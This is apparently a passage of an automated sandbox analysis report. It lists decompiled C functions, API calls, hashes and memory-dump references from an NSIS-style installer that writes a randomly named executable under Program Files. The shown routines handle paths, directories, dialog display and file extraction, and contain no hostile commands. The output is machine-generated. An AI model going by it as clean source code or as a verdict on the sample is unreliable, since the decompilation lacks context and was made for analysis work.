                                                                                            • GetVersion.KERNEL32(00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405C91
                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00405D0C
                                                                                            • GetWindowsDirectoryA.KERNEL32(gqeqcda,00000400), ref: 00405D1F
                                                                                            • SHGetSpecialFolderLocation.SHELL32(?,0041CC48), ref: 00405D5B
                                                                                            • SHGetPathFromIDListA.SHELL32(0041CC48,gqeqcda), ref: 00405D69
                                                                                            • CoTaskMemFree.OLE32(0041CC48), ref: 00405D74
                                                                                            • lstrcatA.KERNEL32(gqeqcda,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D96
                                                                                            • lstrlenA.KERNEL32(gqeqcda,00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405DE8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$gqeqcda
                                                                                            • API String ID: 900638850-1930018659
                                                                                            • Opcode ID: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                                                                                            • Instruction ID: 131396e9090e0f007f21196dc47e10b2e1a614011cd8a075e276219472c4ac8b
                                                                                            • Opcode Fuzzy Hash: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                                                                                            • Instruction Fuzzy Hash: EA510531A04A04ABEB215B65DC88BBF3BA4DF05714F10823BE911B62D1D73C59429E5E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405E29, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00405E29(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405727(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004056E5("*?|<>/\":", _t5))) == 0) {
							E0040585F(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                            0x00405e2b
                                                                                            0x00405e33
                                                                                            0x00405e47
                                                                                            0x00405e47
                                                                                            0x00405e4d
                                                                                            0x00405e5a
                                                                                            0x00405e5a
                                                                                            0x00405e5b
                                                                                            0x00405e5d
                                                                                            0x00405e61
                                                                                            0x00405e63
                                                                                            0x00405e6c
                                                                                            0x00405e6e
                                                                                            0x00405e88
                                                                                            0x00405e90
                                                                                            0x00405e90
                                                                                            0x00405e95
                                                                                            0x00405e97
                                                                                            0x00405e99
                                                                                            0x00405e9d
                                                                                            0x00405e9e
                                                                                            0x00405ea1
                                                                                            0x00405ea9
                                                                                            0x00405eab
                                                                                            0x00405eaf
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405eb5
                                                                                            0x00405eba
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405eba
                                                                                            0x00405ebf

                                                                                            APIs
                                                                                            • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                                                                                            • CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                                                                                            • CharNextA.USER32(?,"C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                                                                                            • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Char$Next$Prev
                                                                                            • String ID: "C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 589700163-2164757518
                                                                                            • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                                                            • Instruction ID: 6784d5a4761720cd8368ccbdd0638492f40d0cd734ea18b92361b53ebca16514
                                                                                            • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                                                            • Instruction Fuzzy Hash: BA11E671804B9129EB3217248C44B7B7F89CB5A7A0F18407BE5D5722C2C77C5E429EAD
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405375, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00405375(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40735c;
				_v36.Group = 0x40735c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40734c;
				_v16.nLength = 0xc;
				if(CreateDirectoryA(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}






                                                                                            0x00405380
                                                                                            0x00405384
                                                                                            0x00405387
                                                                                            0x0040538d
                                                                                            0x00405391
                                                                                            0x00405395
                                                                                            0x0040539d
                                                                                            0x004053a4
                                                                                            0x004053aa
                                                                                            0x004053b1
                                                                                            0x004053c0
                                                                                            0x004053c2
                                                                                            0x00000000
                                                                                            0x004053c2
                                                                                            0x004053cc
                                                                                            0x004053d3
                                                                                            0x004053e9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004053eb
                                                                                            0x004053ef

                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNEL32(?,?,00000000), ref: 004053B8
                                                                                            • GetLastError.KERNEL32 ref: 004053CC
                                                                                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053E1
                                                                                            • GetLastError.KERNEL32 ref: 004053EB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                            • String ID: C:\Program Files (x86)\Gw4n$Ls@$\s@
                                                                                            • API String ID: 3449924974-3228612457
                                                                                            • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                                            • Instruction ID: 9862b429919ab471ad7b2dc8692991af43e8f75a2b46e14c68af8680499b7529
                                                                                            • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                                            • Instruction Fuzzy Hash: 78010C71D14219DADF019BA0DC447EFBFB8EB04354F00453AE904B6180E3B89614CFA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00403EEA, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00403EEA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                                            0x00403efc
                                                                                            0x00403f90
                                                                                            0x00000000
                                                                                            0x00403f90
                                                                                            0x00403f0d
                                                                                            0x00403f11
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403f17
                                                                                            0x00403f20
                                                                                            0x00403f23
                                                                                            0x00403f23
                                                                                            0x00403f29
                                                                                            0x00403f2f
                                                                                            0x00403f2f
                                                                                            0x00403f3b
                                                                                            0x00403f41
                                                                                            0x00403f48
                                                                                            0x00403f4b
                                                                                            0x00403f4e
                                                                                            0x00403f50
                                                                                            0x00403f50
                                                                                            0x00403f58
                                                                                            0x00403f5e
                                                                                            0x00403f5e
                                                                                            0x00403f68
                                                                                            0x00403f6d
                                                                                            0x00403f70
                                                                                            0x00403f75
                                                                                            0x00403f78
                                                                                            0x00403f78
                                                                                            0x00403f88
                                                                                            0x00403f88
                                                                                            0x00000000

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2320649405-0
                                                                                            • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                            • Instruction ID: d9f5f29c4b32eaf67df6904808fcf7c938901a1e5be6cbe83ca05de02e5bcf8c
                                                                                            • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                            • Instruction Fuzzy Hash: A9215471904745ABC7219F78DD08B4BBFF8AF01715F04856AE856E22E0D734EA04CB55
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004026AF, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 86%
                                                                                            			E004026AF(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A29(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E00405727(_t52) == 0) {
					E00402A29(0xffffffed);
				}
				E0040587F(_t52);
				_t27 = E0040589E(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x42ec34; // 0x8800
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030E2(_t47);
						E004030B0(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E0040585F( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                                                            0x004026af
                                                                                            0x004026b1
                                                                                            0x004026bd
                                                                                            0x004026c0
                                                                                            0x004026ca
                                                                                            0x004026ce
                                                                                            0x004026ce
                                                                                            0x004026d4
                                                                                            0x004026e1
                                                                                            0x004026e9
                                                                                            0x004026ec
                                                                                            0x004026f2
                                                                                            0x00402700
                                                                                            0x00402705
                                                                                            0x00402709
                                                                                            0x0040270c
                                                                                            0x00402715
                                                                                            0x00402721
                                                                                            0x00402725
                                                                                            0x00402728
                                                                                            0x00402732
                                                                                            0x00402751
                                                                                            0x00402739
                                                                                            0x0040273e
                                                                                            0x00402746
                                                                                            0x00402749
                                                                                            0x0040274e
                                                                                            0x0040274e
                                                                                            0x00402758
                                                                                            0x00402758
                                                                                            0x0040276a
                                                                                            0x00402771
                                                                                            0x00402783
                                                                                            0x00402783
                                                                                            0x00402789
                                                                                            0x00402789
                                                                                            0x00402794
                                                                                            0x00402795
                                                                                            0x00402799
                                                                                            0x0040279d
                                                                                            0x004027a3
                                                                                            0x004027a3
                                                                                            0x004027aa
                                                                                            0x00402197
                                                                                            0x004028c1
                                                                                            0x004028cd

                                                                                            APIs
                                                                                            • GlobalAlloc.KERNEL32(00000040,00008800,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                                                                            • GlobalFree.KERNEL32 ref: 00402758
                                                                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                                                                                            • GlobalFree.KERNEL32 ref: 00402771
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                                                                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3294113728-0
                                                                                            • Opcode ID: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                                                                                            • Instruction ID: 7359f6b8c72d8bce8f96c3519292fde75c250a44c6e0f48ea69dd088617f1d2a
                                                                                            • Opcode Fuzzy Hash: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                                                                                            • Instruction Fuzzy Hash: 9D319C71C00028BBCF216FA5DE88DAEBA79EF04364F14423AF914762E0C67949018B99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00404EB3, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00404EB3(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42e404; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42ecd4; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405BE9(0, _t39, 0x429878, 0x429878, _a4);
					}
					_t26 = lstrlenA(0x429878);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42e3e8, 0x429878);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x429878;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x429878)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x429878, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                            0x00404eb9
                                                                                            0x00404ec5
                                                                                            0x00404ec8
                                                                                            0x00404ece
                                                                                            0x00404eda
                                                                                            0x00404edd
                                                                                            0x00404ee0
                                                                                            0x00404ee6
                                                                                            0x00404ee6
                                                                                            0x00404eec
                                                                                            0x00404ef4
                                                                                            0x00404ef7
                                                                                            0x00404f14
                                                                                            0x00404f18
                                                                                            0x00404f21
                                                                                            0x00404f21
                                                                                            0x00404f2b
                                                                                            0x00404f34
                                                                                            0x00404f40
                                                                                            0x00404f47
                                                                                            0x00404f4b
                                                                                            0x00404f4e
                                                                                            0x00404f61
                                                                                            0x00404f6f
                                                                                            0x00404f6f
                                                                                            0x00404f73
                                                                                            0x00404f75
                                                                                            0x00404f78
                                                                                            0x00000000
                                                                                            0x00404f78
                                                                                            0x00404ef9
                                                                                            0x00404f01
                                                                                            0x00404f09
                                                                                            0x00404f0f
                                                                                            0x00000000
                                                                                            0x00404f0f
                                                                                            0x00404f09
                                                                                            0x00404ef7
                                                                                            0x00404f82

                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(00429878,00000000,0041CC48,74E5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                            • lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041CC48,74E5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                            • lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041CC48,74E5EA30), ref: 00404F0F
                                                                                            • SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 2531174081-0
                                                                                            • Opcode ID: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
                                                                                            • Instruction ID: b2aff46cb4fd7b93265c813df518c908744a9a116baeb32a25c95395085da7a4
                                                                                            • Opcode Fuzzy Hash: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
                                                                                            • Instruction Fuzzy Hash: BA219D71900118BFDB119FA5CD80DDEBFB9EF45354F14807AF544B62A0C739AE408BA8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00404782, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00404782(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                            0x00404790
                                                                                            0x0040479d
                                                                                            0x004047a3
                                                                                            0x004047e1
                                                                                            0x004047e1
                                                                                            0x004047f0
                                                                                            0x004047f7
                                                                                            0x00000000
                                                                                            0x004047f9
                                                                                            0x004047a5
                                                                                            0x004047b4
                                                                                            0x004047bc
                                                                                            0x004047bf
                                                                                            0x004047d1
                                                                                            0x004047d7
                                                                                            0x004047de
                                                                                            0x00000000
                                                                                            0x004047de
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040479D
                                                                                            • GetMessagePos.USER32 ref: 004047A5
                                                                                            • ScreenToClient.USER32 ref: 004047BF
                                                                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 004047D1
                                                                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047F7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Message$Send$ClientScreen
                                                                                            • String ID: f
                                                                                            • API String ID: 41195575-1993550816
                                                                                            • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                                                            • Instruction ID: 33b793b453c736b4b125c672a543aeedee0a766b6fda49c4207ece5d665b0003
                                                                                            • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                                                            • Instruction Fuzzy Hash: A1019271D00219BADB01DB94CC41BFEBBBCAB49711F10012BBB00B71C0C3B465018BA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00402B6E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414c40; // 0x8800
					_t11 =  *0x428c50;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                            0x00402b7b
                                                                                            0x00402b89
                                                                                            0x00402b8f
                                                                                            0x00402b8f
                                                                                            0x00402b9d
                                                                                            0x00402b9f
                                                                                            0x00402ba5
                                                                                            0x00402bac
                                                                                            0x00402bae
                                                                                            0x00402bae
                                                                                            0x00402bc4
                                                                                            0x00402bd4
                                                                                            0x00402be6
                                                                                            0x00402be6
                                                                                            0x00402bee

                                                                                            APIs
                                                                                            Strings
                                                                                            • verifying installer: %d%%, xrefs: 00402BBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
